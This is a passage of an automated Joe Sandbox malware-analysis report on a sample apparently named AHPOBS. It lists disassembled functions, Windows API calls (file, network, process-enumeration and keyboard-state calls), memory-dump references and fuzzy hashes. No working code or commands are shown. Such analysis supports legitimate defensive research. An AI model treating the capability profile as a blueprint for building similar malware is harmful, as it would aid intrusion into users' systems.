                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window_memmove
                                      • String ID:
                                      • API String ID: 517827167-0
                                      • Opcode ID: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                      • Instruction ID: bb29974ae8a0ca66dd60d7796f545a3f68a626f1234de100ca197a45a268520a
                                      • Opcode Fuzzy Hash: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                      • Instruction Fuzzy Hash: 5111CEB22001157AE200AAA6EC80DFBF75CEBD0365F04413BFD0892102DB39A95983B9
                                      Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee4c4a5c7054ba07455d943a9bfb5626f2de0b7f12cf5c334c4ed6af209572f3
                                      • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                      • Opcode Fuzzy Hash: ee4c4a5c7054ba07455d943a9bfb5626f2de0b7f12cf5c334c4ed6af209572f3
                                      • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                      Function 0045412D Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memmove.LIBCMT ref: 00454193
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _malloc_memmove
                                      • String ID:
                                      • API String ID: 1183979061-0
                                      • Opcode ID: 4b4a0083377cc3002ba412c4040cae9b8dd9ebd9bb40a044e6749de80c961713
                                      • Instruction ID: b7bf8a3162b370cc582f1269759c4cf98c23818cc852772d4725ff46417d7135
                                      • Opcode Fuzzy Hash: 4b4a0083377cc3002ba412c4040cae9b8dd9ebd9bb40a044e6749de80c961713
                                      • Instruction Fuzzy Hash: 0E01F572100A006BD620EF5AD880D9BB7ACEFD6328F10452FF96447202D739B49587A9
                                      Function 00403910 Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNEL32(00000000,?,00010000,?,00000000,?,?), ref: 00403962
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                      • Instruction ID: 166f8584a356b396cff84430351b18548b9fac1e31d224f9c9bf96d02c5d03dd
                                      • Opcode Fuzzy Hash: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                      • Instruction Fuzzy Hash: 42111CB1200B019FD320CF55C984F27BBF8AB44711F10892ED5AA96B80D7B4FA45CBA4
                                      Function 0044C1B5 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 0044C1F2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _malloc_memmove
                                      • String ID:
                                      • API String ID: 1183979061-0
                                      • Opcode ID: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                      • Instruction ID: 60fa024ef6ba522ef03b0058c27b5a86e99fade8cb479355d4b2ad9ce4e818de
                                      • Opcode Fuzzy Hash: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                      • Instruction Fuzzy Hash: 25017574504640AFD321EF59C841D67B7E9EF99704B14845EF9D687702C675FC02C7A4
                                      Function 00441EBA Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00441ECD
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcscpy
                                      • String ID:
                                      • API String ID: 3469035223-0
                                      • Opcode ID: 611bdd1bce6b08a39b3ffc0a7d572f0eca65f574359c77a1447a2b24e27a2d60
                                      • Instruction ID: 2fbb190dad4ce56573c0fa61da4d13feb20fc8bc688041f2d473ed6297838154
                                      • Opcode Fuzzy Hash: 611bdd1bce6b08a39b3ffc0a7d572f0eca65f574359c77a1447a2b24e27a2d60
                                      • Instruction Fuzzy Hash: 42F03172600204AFD700DF9DEC8199BB3E8EF88725F14812AFA18D7251D6B5ED458BA5
                                      Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __lock_file
                                      • String ID:
                                      • API String ID: 3031932315-0
                                      • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                      • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                      • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                      • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                      Function 00443D19 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00443D34
                                        • Part of subcall function 00433D9E: EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: EnumProcesses_wcslen
                                      • String ID:
                                      • API String ID: 3303492691-0
                                      • Opcode ID: 61840f1e4be6ab7e74efaef90a4495a36a15179c598b7116193463e31052faad
                                      • Instruction ID: 973e428d5754fd58bf011f848023120356fa753a79d0ada774503799e32604de
                                      • Opcode Fuzzy Hash: 61840f1e4be6ab7e74efaef90a4495a36a15179c598b7116193463e31052faad
                                      • Instruction Fuzzy Hash: 05E0E5B3A010187BEA106A4ABC81DCB735CDBCA72EF040027F60887221E229AE0542F9
                                      Function 004589AC Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000202,?), ref: 004589C6
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: 7202705a9892f4bd4a2423c339a1cc919efe15e3859c0a303b549491d84c9c0e
                                      • Instruction ID: 50042109da9cb7071167785bc1ba5dfd020c55d47bb24ccc02d0932d492e023f
                                      • Opcode Fuzzy Hash: 7202705a9892f4bd4a2423c339a1cc919efe15e3859c0a303b549491d84c9c0e
                                      • Instruction Fuzzy Hash: E0F0A0372043046FD320EE799C56EAB77ECAF85A20F048A2EBDA4C72C5DA75D904C795
                                      Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                      • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                      • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                      • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                      Function 0040E050 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                      • Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
                                      • Opcode Fuzzy Hash: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                      • Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5
                                      Function 00436327 Relevance: 1.5, APIs: 1, Instructions: 16windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 0043633F
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSendTimeout
                                      • String ID:
                                      • API String ID: 1599653421-0
                                      • Opcode ID: 9860d8fd04dca8f4639475c0e949a449d7e9360e0213879cd93aaa3a815527bf
                                      • Instruction ID: 404f820d5c191ead8adfbb6f72584c17bf9223e8bc32b4a3dee19ec2549da310
                                      • Opcode Fuzzy Hash: 9860d8fd04dca8f4639475c0e949a449d7e9360e0213879cd93aaa3a815527bf
                                      • Instruction Fuzzy Hash: 9BD0C97139030876E7248A659D0BF96375C5710F40F5081257B04A91D0D9A0F5408658
                                      Function 0045A3FE Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowTextW.USER32(?,00000000), ref: 0045A417
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: TextWindow
                                      • String ID:
                                      • API String ID: 530164218-0
                                      • Opcode ID: 39ab12bcd539f566f9dea5a3ededab9ed65a5f16605081fb930bde218f2aabbd
                                      • Instruction ID: 630e00077c8ae74d59962b812fa4adb9c431e8497940f7c51c81685005244029
                                      • Opcode Fuzzy Hash: 39ab12bcd539f566f9dea5a3ededab9ed65a5f16605081fb930bde218f2aabbd
                                      • Instruction Fuzzy Hash: 8BD0C975214204AFC340EBA4DC88C2677ECAB987653418829B804CB222C634FD418BA8
                                      Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                      Function 004725E1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004725F0
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FolderPath
                                      • String ID:
                                      • API String ID: 1514166925-0
                                      • Opcode ID: 2de512cec78399c0bf4693007645a811ad418ae9abd944a38d33811ad3ab03e9
                                      • Instruction ID: dc9a77a9ab6d49dacfa1cff77643056435d6e4e9731ad488e59261afbb404366
                                      • Opcode Fuzzy Hash: 2de512cec78399c0bf4693007645a811ad418ae9abd944a38d33811ad3ab03e9
                                      • Instruction Fuzzy Hash: 51C09230388204BAF7284B50CE4FFA82220B714F02F204088B70A380C196E069499A2E
                                      Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(?,?,00426FBF), ref: 0040DA3D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                      • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                      • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                      • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50

                                      Non-executed Functions

                                      Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                      • SendMessageW.USER32 ref: 0047CA7F
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                      • ImageList_SetDragCursorImage.COMCTL32(00BCF7D8,00000000,00000000,00000000), ref: 0047CB9B
                                      • ImageList_BeginDrag.COMCTL32(00BCF7D8,00000000,000000F8,000000F0), ref: 0047CBAC
                                      • SetCapture.USER32(?), ref: 0047CBB6
